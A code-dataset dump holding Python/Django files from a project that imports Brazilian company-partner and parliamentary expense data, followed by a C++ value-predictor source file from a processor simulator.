open('PF_LOG.txt', 'w')\n\n log.write(f'{datetime.now().isoformat()} Abrindo CSV\\n')\n csv = pd.read_csv(\n options['csv'],\n chunksize=100000,\n dtype={'cpf_cnpj_socio': str, 'cnpj_empresa': str}\n )\n\n pessoa_id = 1\n for contador, grupo in enumerate(csv):\n if contador >= options.get('inicio', 0):\n log.write(f'{datetime.now().isoformat()} Filtrando socios PF do 
grupo {contador}\\n')\n grupo = grupo[grupo['codigo_tipo_socio'] == 2]\n sociedades = []\n pessoas = []\n log.write(f'{datetime.now().isoformat()} Importando dados do grupo {contador}\\n')\n for indice, dados in enumerate(grupo.itertuples()):\n pessoas.append(PessoaFisica(nome=dados.nome_socio, id=pessoa_id))\n sociedades.append(Sociedade(\n tipo_socio=2,\n qualificacao_socio=dados.codigo_qualificacao_socio,\n empresa_id=dados.cnpj_empresa,\n socio_pessoa_fisica_id=pessoa_id\n ))\n pessoa_id += 1\n log.write(f'{datetime.now().isoformat()} Cirando PFs do grupo {contador}\\n')\n PessoaFisica.objects.bulk_create(pessoas)\n log.write(f'{datetime.now().isoformat()} Cirando Sociedades do grupo {contador}\\n')\n Sociedade.objects.bulk_create(sociedades)\n\n" }, { "alpha_fraction": 0.6141732335090637, "alphanum_fraction": 0.6358267664909363, "avg_line_length": 27.22222137451172, "blob_id": "4d68f7a927c933efb72fd128fe2685ef764cd74e", "content_id": "26d342724ebf79961d743edf728e79fe1e5c9563", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 508, "license_type": "no_license", "max_line_length": 66, "num_lines": 18, "path": "/politicos/graficos.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "import matplotlib.pylab as plt\n\nfrom politicos.models import Deputado\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\ndef graficos_gasto_mensal():\n media_mensal = Deputado.objects.get_media_mensal()\n\n dados = sorted(media_mensal.items())\n\n eixo_x = ['/'.join(dado[0].split('_')[1:3]) for dado in dados]\n eixo_y = [dado[1] if dado[1] else 0 for dado in dados]\n\n return zip(chunks(eixo_x, 12), chunks(eixo_y, 12))\n" }, { "alpha_fraction": 0.5844535231590271, "alphanum_fraction": 0.5897136330604553, "avg_line_length": 39.71428680419922, "blob_id": "11fc6235f009bdf51d56da0cd559cf696acc43df", "content_id": 
"870236799459d4bc14184c13ba7f108f32a59865", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1711, "license_type": "no_license", "max_line_length": 113, "num_lines": 42, "path": "/empresas/management/commands/import_estrangeiros.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "import bisect\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nimport csv\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\n\nfrom empresas.models import Estrangeiro, Sociedade\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv', type=str)\n parser.add_argument('inicio', type=int)\n\n def handle(self, *args, **options):\n log = open('ESTRANGEIROS_LOG.txt', 'w')\n\n log.write(f'{datetime.now().isoformat()} Abrindo CSV\\n')\n csv = pd.read_csv(\n options['csv'],\n chunksize=100000,\n dtype={'cpf_cnpj_socio': str, 'cnpj_empresa': str}\n )\n\n for contador, grupo in enumerate(csv):\n if contador >= options.get('inicio', 0):\n log.write(f'{datetime.now().isoformat()} Filtrando socios estrangeiros do grupo {contador}\\n')\n grupo = grupo[grupo['codigo_tipo_socio'] == 3]\n sociedades = []\n log.write(f'{datetime.now().isoformat()} Inserindo dados de estrangeiros do grupo {contador}\\n')\n for dados in grupo.itertuples():\n estrangeiro = Estrangeiro.objects.create(nome=dados.nome_socio)\n sociedades.append(Sociedade(\n tipo_socio=3,\n qualificacao_socio=dados.codigo_qualificacao_socio,\n empresa_id=dados.cnpj_empresa,\n socio_estrangeiro=estrangeiro\n ))\n log.write(f'{datetime.now().isoformat()} Cirando Sociedades do grupo {contador}\\n')\n Sociedade.objects.bulk_create(sociedades)\n\n" }, { "alpha_fraction": 0.5625413656234741, "alphanum_fraction": 0.5833885073661804, "avg_line_length": 48.540985107421875, "blob_id": "128e890060a3a1a7b8e6fb8afed1be31eaf2a1bd", "content_id": 
"87ff7e687c4e4d7f0343107151d18624446ad932", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3022, "license_type": "no_license", "max_line_length": 140, "num_lines": 61, "path": "/politicos/migrations/0005_auto_20180508_1559.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-08 15:59\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('empresas', '0005_empresa_uf'),\n ('politicos', '0004_auto_20180504_1903'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='GastoCotaParlamentar',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('legislatura', models.IntegerField(null=True)),\n ('data_emissao', models.DateTimeField(null=True)),\n ('id_documento', models.IntegerField(null=True)),\n ('tipo_documento', models.IntegerField(choices=[(0, 'Nota Fiscal'), (1, 'Recibo'), (2, 'Despesa no Exterior')], null=True)),\n ('ano', models.IntegerField(null=True)),\n ('especificacao_subcota', models.IntegerField(null=True)),\n ('lote', models.IntegerField(null=True)),\n ('mes', models.IntegerField(null=True)),\n ('parcela', models.IntegerField(null=True)),\n ('ressarcimento', models.IntegerField(null=True)),\n ('subcota', models.IntegerField(null=True)),\n ('cpf', models.CharField(max_length=14, null=True)),\n ('descricao', models.CharField(max_length=127, null=True)),\n ('descricao_especificacao', models.CharField(max_length=31, null=True)),\n ('fornecedor', models.CharField(max_length=255, null=True)),\n ('numero_documento', models.CharField(max_length=63, null=True)),\n ('nome_passageiro', models.CharField(max_length=63, null=True)),\n ('trecho_viagem', models.CharField(max_length=127, null=True)),\n ('valor_documento', models.DecimalField(decimal_places=2, max_digits=8, null=True)),\n 
('valor_glosa', models.DecimalField(decimal_places=2, max_digits=8, null=True)),\n ('valor_liquido', models.DecimalField(decimal_places=2, max_digits=8, null=True)),\n ('valor_restituicao', models.DecimalField(decimal_places=2, max_digits=8, null=True)),\n ],\n options={\n 'ordering': ['-data_emissao'],\n },\n ),\n migrations.AddField(\n model_name='deputado',\n name='carteira_parlamentar',\n field=models.IntegerField(null=True),\n ),\n migrations.AddField(\n model_name='gastocotaparlamentar',\n name='deputado',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='gastos', to='politicos.Deputado'),\n ),\n migrations.AddField(\n model_name='gastocotaparlamentar',\n name='empresa',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='gastos_deputados', to='empresas.Empresa'),\n ),\n ]\n" }, { "alpha_fraction": 0.7634408473968506, "alphanum_fraction": 0.7634408473968506, "avg_line_length": 17.600000381469727, "blob_id": "dc3641bf68c387968c1b0aa934e43804a0e12e62", "content_id": "2d139da92696a1aa53a275e74067ac895a26d55b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/politicos/apps.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass PoliticosConfig(AppConfig):\n name = 'politicos'\n" }, { "alpha_fraction": 0.8723404407501221, "alphanum_fraction": 0.8723404407501221, "avg_line_length": 22.5, "blob_id": "dc7fcdcb919f86dac861a0b65b586a21b899b04c", "content_id": "f63bee12c13675799380b49c2548b37112ae3573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 94, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/.env.example", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": 
"POSTGRES_DB=brasilio\nPOSTGRES_USER=brasilio\nPOSTGRES_PASSWORD=brasilio\nPOSTGRES_HOST=database\n" }, { "alpha_fraction": 0.525390625, "alphanum_fraction": 0.56640625, "avg_line_length": 22.272727966308594, "blob_id": "0f87187d4b78e9b744e8f513e4c96dfd398508f5", "content_id": "d5dcd41ab6b7896668073d8ecfebaee987d6fa20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 512, "license_type": "no_license", "max_line_length": 85, "num_lines": 22, "path": "/politicos/migrations/0002_auto_20180504_1821.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-04 18:21\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('politicos', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='partido',\n name='id',\n ),\n migrations.AlterField(\n model_name='partido',\n name='sigla',\n field=models.CharField(max_length=15, primary_key=True, serialize=False),\n ),\n ]\n" }, { "alpha_fraction": 0.6049586534500122, "alphanum_fraction": 0.6115702390670776, "avg_line_length": 26.5, "blob_id": "fb00c0f23782bad5032151d021137771f411fb9a", "content_id": "b9dfeb777ead76f1fbf32159dada5a58809da7ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 605, "license_type": "no_license", "max_line_length": 97, "num_lines": 22, "path": "/politicos/management/commands/import_partidos.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "import requests\nfrom django.core.management import BaseCommand\n\nfrom politicos.models import Partido\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n partidos = []\n\n camara_url = 'https://dadosabertos.camara.leg.br/api/v2/partidos/?formato=json&itens=100'\n\n resposta = requests.get(camara_url).json()\n\n for partido in resposta['dados']:\n 
partidos.append(Partido(\n id_camara=partido['id'],\n nome=partido['nome'],\n sigla=partido['sigla'],\n ))\n\n Partido.objects.bulk_create(partidos)\n" }, { "alpha_fraction": 0.6226053833961487, "alphanum_fraction": 0.6347962617874146, "avg_line_length": 36.045162200927734, "blob_id": "56baa713d838c2dba7b4b0ed6ff6b1259e099a47", "content_id": "c3a8f98a0302777b4eb7547686799a4a63c4731c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5742, "license_type": "no_license", "max_line_length": 95, "num_lines": 155, "path": "/politicos/models.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.db.models import Avg, F, FilteredRelation, Prefetch, Q, Sum\n\n\nclass DeputadoQuerySet(models.QuerySet):\n\n def annotate_gasto_mensal_por_deputado(self):\n meses = range(1, 13)\n anos = range(2009, 2019)\n annotations = {\n f'gastos_{ano}_{mes:02}': Sum(\n 'gastos__valor_liquido',\n filter=Q(gastos__mes=mes, gastos__ano=ano)\n )\n for ano in anos for mes in meses\n }\n return self.annotate(**annotations)\n\n def annotate_gasto_no_mes_por_deputado(self, mes, ano):\n annotation = {\n f'gastos_{ano}_{mes:02}': Sum(\n 'gastos__valor_liquido',\n filter=Q(gastos__mes=mes, gastos__ano=ano)\n )\n }\n return self.annotate(**annotation)\n\n def annotate_gasto_no_mes_por_deputado2(self, mes, ano):\n return self.annotate(\n gastos_filtrados=FilteredRelation(\n 'gastos',\n condition=Q(gastos__mes=mes, gastos__ano=ano)\n )\n ).annotate(\n **{f'gastos_{ano}_{mes:02}': Sum('gastos_filtrados__valor_liquido')}\n )\n\n def get_media_mensal(self):\n meses = range(1, 13)\n anos = range(2009, 2019)\n aggregations = {\n f'media_{ano}_{mes:02}': Avg(f'gastos_{ano}_{mes:02}')\n for ano in anos for mes in meses\n }\n return self.annotate_gasto_mensal_por_deputado().aggregate(**aggregations)\n\n def prefetch_gastos(self, **kwargs):\n gastos_queryset = 
GastoCotaParlamentar.objects.select_related(\n 'empresa'\n ).filter(**kwargs)\n prefetch = Prefetch('gastos', queryset=gastos_queryset)\n return self.prefetch_related(prefetch)\n\n def annotate_gastos_acima_dobro(self, descricao_gasto):\n media = GastoCotaParlamentar.objects.filter_descricao(descricao_gasto).media()\n acima_dobro = Q(gastos__descricao=descricao_gasto, gastos__valor_liquido__gt=media * 2)\n count_acima_dobro = Count('pk', filter=acima_dobro)\n count_geral = Count('pk', filter=Q(gastos__descricao=descricao_gasto))\n return self.annotate(gastos_acima_dobro=count_acima_dobro, qtd_gastos=count_geral)\n\n\nclass GastoCotaParlamentarQuerySet(models.QuerySet):\n\n def filter_descricao(self, descricao):\n return self.filter(descricao=descricao)\n\n def media(self):\n return self.aggregate(media=Avg('valor_liquido'))['media']\n\n\n\nclass Partido(models.Model):\n sigla = models.CharField(max_length=15, primary_key=True)\n nome = models.CharField(max_length=255)\n id_camara = models.IntegerField()\n\n def __str__(self):\n return self.sigla\n\n\nclass Deputado(models.Model):\n nome = models.CharField(max_length=255)\n partido = models.ForeignKey(Partido, on_delete=models.PROTECT)\n uf = models.ForeignKey('comum.Estado', on_delete=models.PROTECT)\n id_legislatura = models.IntegerField()\n carteira_parlamentar = models.IntegerField(null=True)\n\n objects = DeputadoQuerySet.as_manager()\n\n def __str__(self):\n return f'{self.nome} - {self.partido_id}'\n\n\nclass GastoCotaParlamentar(models.Model):\n TIPOS_DOCUMENTO = (\n (0, 'Nota Fiscal'),\n (1, 'Recibo'),\n (2, 'Despesa no Exterior'),\n )\n legislatura = models.IntegerField(null=True)\n data_emissao = models.DateTimeField(null=True)\n id_documento = models.IntegerField(null=True)\n tipo_documento = models.IntegerField(choices=TIPOS_DOCUMENTO, null=True)\n ano = models.IntegerField(null=True)\n especificacao_subcota = models.IntegerField(null=True)\n lote = models.IntegerField(null=True)\n mes = 
models.IntegerField(null=True)\n parcela = models.IntegerField(null=True)\n ressarcimento = models.IntegerField(null=True)\n subcota = models.IntegerField(null=True)\n cpf = models.CharField(max_length=14, null=True)\n descricao = models.CharField(max_length=127, null=True)\n descricao_especificacao = models.CharField(max_length=31, null=True)\n fornecedor = models.CharField(max_length=255, null=True)\n numero_documento = models.CharField(max_length=63, null=True)\n nome_passageiro = models.CharField(max_length=63, null=True)\n trecho_viagem = models.CharField(max_length=127, null=True)\n valor_documento = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n valor_glosa = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n valor_liquido = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n valor_restituicao = models.DecimalField(null=True, max_digits=8, decimal_places=2)\n deputado = models.ForeignKey(\n Deputado,\n related_name='gastos',\n db_index=True,\n on_delete=models.PROTECT,\n )\n empresa = models.ForeignKey(\n 'empresas.Empresa',\n related_name='gastos_deputados',\n db_index=True,\n on_delete=models.PROTECT,\n null=True,\n )\n\n objects = GastoCotaParlamentarQuerySet.as_manager()\n\n def __str__(self):\n return f'{self.valor_documento} {self.mes}/{self.ano}'\n\n class Meta:\n indexes = [\n models.Index(fields=['-data_emissao']),\n models.Index(fields=['data_emissao']),\n models.Index(fields=['mes']),\n models.Index(fields=['ano']),\n models.Index(fields=['descricao']),\n models.Index(fields=['descricao_especificacao']),\n models.Index(fields=['fornecedor']),\n models.Index(fields=['valor_liquido']),\n models.Index(fields=['valor_documento']),\n models.Index(fields=['deputado']),\n models.Index(fields=['empresa']),\n ]\n ordering = ['-data_emissao']\n" }, { "alpha_fraction": 0.7411764860153198, "alphanum_fraction": 0.7411764860153198, "avg_line_length": 16, "blob_id": "e3fd296e9ded09c1b6b26b38c59b58d82bc01a82", 
"content_id": "8401e5ee8306fca2b1f6f63e9ff1ef38534939c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/comum/apps.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass ComumConfig(AppConfig):\n name = 'comum'\n" }, { "alpha_fraction": 0.5093833804130554, "alphanum_fraction": 0.5361930131912231, "avg_line_length": 23.064516067504883, "blob_id": "6094d175aeb96a7082f8455b27ff217db204ffa6", "content_id": "b1a196bfe4724f1b031e8b069e964f8352028f23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 746, "license_type": "no_license", "max_line_length": 49, "num_lines": 31, "path": "/politicos/migrations/0004_auto_20180504_1903.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-04 19:03\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('politicos', '0003_deputado'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='partido',\n name='deferimento',\n ),\n migrations.RemoveField(\n model_name='partido',\n name='legenda',\n ),\n migrations.RemoveField(\n model_name='partido',\n name='presidente_nacional',\n ),\n migrations.AddField(\n model_name='partido',\n name='id_camara',\n field=models.IntegerField(default=1),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.5275055170059204, "alphanum_fraction": 0.5305060744285583, "avg_line_length": 42.842105865478516, "blob_id": "841fc5846c0d12e068f0c4a0bf04ade6949664e1", "content_id": "abaffb61414362f2ec16f8e5e4a8ae0390992fb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5003, "license_type": "no_license", "max_line_length": 115, "num_lines": 114, 
"path": "/politicos/management/commands/import_gastos.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "from dateutil.parser import parse\nfrom datetime import datetime\nimport pandas as pd\nfrom django.core.management import BaseCommand\n\nfrom empresas.models import Empresa\nfrom politicos.models import GastoCotaParlamentar, Deputado\n\n\nclass Command(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument('csv', type=str)\n parser.add_argument('inicio', type=int)\n\n def parse_data(self, data):\n try:\n return parse(data)\n except Exception:\n return None\n\n def handle(self, *args, **options):\n log = open('GASTOS_LOG.txt', 'a')\n\n cnpjs_salvos = list(Empresa.objects.values_list('cnpj', flat=True))\n deputados_salvos = list(Deputado.objects.values_list('id', flat=True))\n\n log.write(f'{datetime.now().isoformat()} Abrindo CSV\\n')\n csv = pd.read_csv(\n options['csv'],\n chunksize=100000,\n converters={\n 'txtCNPJCPF': str,\n }\n )\n\n for contador, grupo in enumerate(csv):\n if contador >= options.get('inicio', 0):\n log.write(f'{datetime.now().isoformat()} Importando dados do grupo {contador}\\n')\n grupo = grupo[grupo['codLegislatura'] == 55]\n\n log.write(f'{datetime.now().isoformat()} Criando empresas não registradas do grupo {contador}\\n')\n empresas_invalidas = grupo[\n (grupo['txtCNPJCPF'].str.len() == 14) &\n (~grupo['txtCNPJCPF'].isin(cnpjs_salvos))\n ]\n empresas_invalidas = empresas_invalidas.drop_duplicates(['txtCNPJCPF'], keep='first')\n empresas = []\n for empresa in empresas_invalidas.itertuples():\n empresas.append(Empresa(\n cnpj=empresa.txtCNPJCPF,\n nome=empresa.txtFornecedor,\n uf_id=empresa.sgUF\n ))\n cnpjs_salvos.append(empresa.txtCNPJCPF)\n\n Empresa.objects.bulk_create(empresas)\n\n\n log.write(f'{datetime.now().isoformat()} Criando deputados não registradas do grupo {contador}\\n')\n deputados = grupo[\n (~grupo['idecadastro'].isin(deputados_salvos))\n ]\n deputados = 
deputados.drop_duplicates(['idecadastro'], keep='first')\n deputados_novos = []\n for dados in deputados.itertuples():\n deputados_novos.append(Deputado(\n id=dados.idecadastro,\n nome=dados.txNomeParlamentar,\n partido_id=dados.sgPartido,\n id_legislatura=dados.codLegislatura,\n carteira_parlamentar=dados.nuCarteiraParlamentar,\n uf_id=dados.sgUF,\n ))\n deputados_salvos.append(dados.idecadastro)\n\n Deputado.objects.bulk_create(deputados_novos)\n\n log.write(f'{datetime.now().isoformat()} Importando gastos do grupo {contador}\\n')\n gastos = []\n for dados in grupo.itertuples():\n cnpj = dados.txtCNPJCPF if len(dados.txtCNPJCPF) == 14 else None\n cpf = dados.txtCNPJCPF if len(dados.txtCNPJCPF) == 11 else None\n data = self.parse_data(dados.datEmissao)\n gastos.append(GastoCotaParlamentar(\n deputado_id=dados.idecadastro,\n empresa_id=cnpj,\n cpf=cpf,\n legislatura=dados.codLegislatura,\n data_emissao=data,\n id_documento=dados.ideDocumento,\n tipo_documento=dados.indTipoDocumento,\n ano=dados.numAno,\n mes=dados.numMes,\n subcota=dados.numSubCota,\n especificacao_subcota=dados.numEspecificacaoSubCota,\n lote=dados.numLote,\n parcela=dados.numParcela,\n descricao=dados.txtDescricao,\n descricao_especificacao=dados.txtDescricaoEspecificacao,\n fornecedor=dados.txtFornecedor,\n numero_documento=dados.txtNumero,\n nome_passageiro=dados.txtPassageiro,\n trecho_viagem=dados.txtTrecho,\n valor_documento=dados.vlrDocumento,\n valor_glosa=dados.vlrGlosa,\n valor_liquido=dados.vlrLiquido,\n valor_restituicao=dados.vlrRestituicao,\n ))\n\n log.write(f'{datetime.now().isoformat()} Criando gastos do grupo {contador}\\n')\n GastoCotaParlamentar.objects.bulk_create(gastos)\n\n log.write(f'{datetime.now().isoformat()} Importação finalizada\\n')\n\n" }, { "alpha_fraction": 0.4882459342479706, "alphanum_fraction": 0.5443037748336792, "avg_line_length": 21.1200008392334, "blob_id": "eec3cf727b8730fc32f20da78a27e4eed642a892", "content_id": "edd7f8cf9b4843233a9669a37a69d69bad96a014", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 48, "num_lines": 25, "path": "/empresas/migrations/0007_auto_20180517_1932.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-17 19:32\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('empresas', '0006_auto_20180513_0541'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='empresa',\n name='empresas',\n ),\n migrations.RemoveField(\n model_name='estrangeiro',\n name='empresas',\n ),\n migrations.RemoveField(\n model_name='pessoafisica',\n name='empresas',\n ),\n ]\n" }, { "alpha_fraction": 0.6210721135139465, "alphanum_fraction": 0.6561922430992126, "avg_line_length": 27.473684310913086, "blob_id": "8ee0efe3832183cab21a810c38adb12bdb08d587", "content_id": "3898f1637cf0a318087f46693343ee21a7ea86d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 541, "license_type": "no_license", "max_line_length": 148, "num_lines": 19, "path": "/politicos/migrations/0007_auto_20180513_0241.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-13 02:41\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('politicos', '0006_remove_deputado_id_camara'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='gastocotaparlamentar',\n name='empresa',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='gastos_deputados', to='empresas.Empresa'),\n ),\n ]\n" }, { "alpha_fraction": 0.5660971403121948, "alphanum_fraction": 0.6020683646202087, "avg_line_length": 38.01754379272461, "blob_id": "2943fdbf3e7af41353c276bb1eb805066f3620d5", 
"content_id": "b6e1b8ef469bde470c7a6ace694d2fbb722ff64d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2224, "license_type": "no_license", "max_line_length": 106, "num_lines": 57, "path": "/politicos/migrations/0008_auto_20180516_1511.py", "repo_name": "labcodes/dados_brasil_io", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0.4 on 2018-05-16 15:11\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('politicos', '0007_auto_20180513_0241'),\n ]\n\n operations = [\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['-data_emissao'], name='politicos_g_data_em_147448_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['data_emissao'], name='politicos_g_data_em_706148_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['mes'], name='politicos_g_mes_2ed906_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['ano'], name='politicos_g_ano_2863bc_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['descricao'], name='politicos_g_descric_179e32_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['descricao_especificacao'], name='politicos_g_descric_747dd9_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['fornecedor'], name='politicos_g_fornece_d50161_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['valor_liquido'], name='politicos_g_valor_l_54a491_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['valor_documento'], name='politicos_g_valor_d_77e5c1_idx'),\n ),\n migrations.AddIndex(\n 
model_name='gastocotaparlamentar',\n index=models.Index(fields=['deputado'], name='politicos_g_deputad_193b26_idx'),\n ),\n migrations.AddIndex(\n model_name='gastocotaparlamentar',\n index=models.Index(fields=['empresa'], name='politicos_g_empresa_edaff8_idx'),\n ),\n ]\n" } ]
31
SureshN-Git/Hybrid_Address_Value_Predictor
https://github.com/SureshN-Git/Hybrid_Address_Value_Predictor
429eb0e2d39c0184f19f47723a2cc38ed04b68b3
b54cc6cf61ed4da995adbec93174f7f82ed1d709
c1aace1b96e487edb1b8e8fe353bd82b5a534f44
refs/heads/master
2022-02-25T15:06:11.920853
2019-10-25T03:28:45
2019-10-25T06:35:40
216,934,406
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48515331745147705, "alphanum_fraction": 0.5516858696937561, "avg_line_length": 18.9639892578125, "blob_id": "02bc18313b901cb9acdf81c4880ab5b3e863e3e6", "content_id": "c5b988144bb9dff30051bcca229be955a01d3e32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 14414, "license_type": "no_license", "max_line_length": 119, "num_lines": 722, "path": "/721sim-partial/uarchsim/predictor.cc", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <math.h>\n#include <cmath>\n#include <assert.h>\n#include <iostream>\n#include <stdlib.h>\n#include \"predictor.h\"\n\nusing namespace std;\n\npredictor::predictor(uint64_t AL_size, uint64_t type, uint64_t ORD)\n{\n\tuint64_t count = pow(2,15);\n\tuint64_t count1 = pow(2,25);\n\tpredict = new pred[count];\n\thystride = new hyb_pred[count];\n\tvpt = new VPT[count1];\n\tchooser = new uint64_t[count];\n\tfor (uint64_t i = 0; i < count; i++)\n\t{\n\t\tpredict[i].last_val = 0;\n\t\tpredict[i].last_val2 = 0;\n\t\tpredict[i].last_val3 = 0;\n\t\tpredict[i].last_val4 = 0;\n\t\tpredict[i].del = 0;\n\t\tpredict[i].conf = 0;\n\t\tpredict[i].iter_count = 0;\n\t\tchooser[i] = 1;\n\t}\n\n\tfor (uint64_t i = 0; i < count1; i++)\n\t{\n\t\tvpt[i].value = 0;\n\t\tvpt[i].conf = 0;\n\t}\n\tal_size = AL_size;\n\tupdate_queue = new uint64_t[al_size];\n\torder = ORD;\n\tuq_tail = 0;\n\tuq_head = 0;\n}\n\nuint64_t predictor::stride(uint64_t tag)\n{\n\n\tuint64_t value;\n\tpredict[tag].iter_count++;\n\tvalue = predict[tag].last_val + (predict[tag].del * predict[tag].iter_count);\n\treturn value;\n}\n\nuint64_t predictor::last_value(uint64_t tag)\n{\n\treturn predict[tag].last_val;\n}\n\nuint64_t predictor::get_val(uint64_t type, uint64_t PC)\n{\n\tuint64_t value;\n\tuint64_t tag = PC>>2;\n\ttag = tag & 32767;\n\n\tif (type == 1)\n\t{\n\t\tcounter = 1;\n\t\tvalue = stride(tag);\n\t}\n\telse if (type == 
2)\n\t{\n\t\tvalue = last_value(tag);\n\t\tcounter = 2;\n\t}\n\n\treturn value;\n}\n\nuint64_t predictor::get_context_val(uint64_t LV1, uint64_t LV2,uint64_t LV3, uint64_t LV4, uint64_t found, uint64_t PC)\n{\n\tuint64_t value, tag;\n\tuint64_t tag1;\n\ttag1 = PC >> 2;\n\ttag1 = tag1 & 32767;\n\n\tcounter = 3;\n\tif (order == 4) {\n\t\tif(found >= 4)\n\t\t{\n\t\t\ttag = hash(PC,LV4, LV3, LV2, LV1);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 3)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val4,LV3,LV2, LV1);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 2)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val3, predict[tag1].last_val4,LV2,LV1);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 1)\n\t\t{\n\t\t\ttag = hash(PC, predict[tag1].last_val2, predict[tag1].last_val3,predict[tag1].last_val4,LV1);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if (found == 0)\n\t\t{\n\t\t\ttag = hash(PC,predict[tag1].last_val, predict[tag1].last_val2, predict[tag1].last_val3, predict[tag1].last_val4);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t}\n\telse if (order == 3) {\n\t\tif (found == 3) {\n\t\t\ttag = hash(PC, LV3, LV2, LV1, 0);\n\t\t\tvalue = vpt[tag].value;\n\t\t}\n\t\telse if 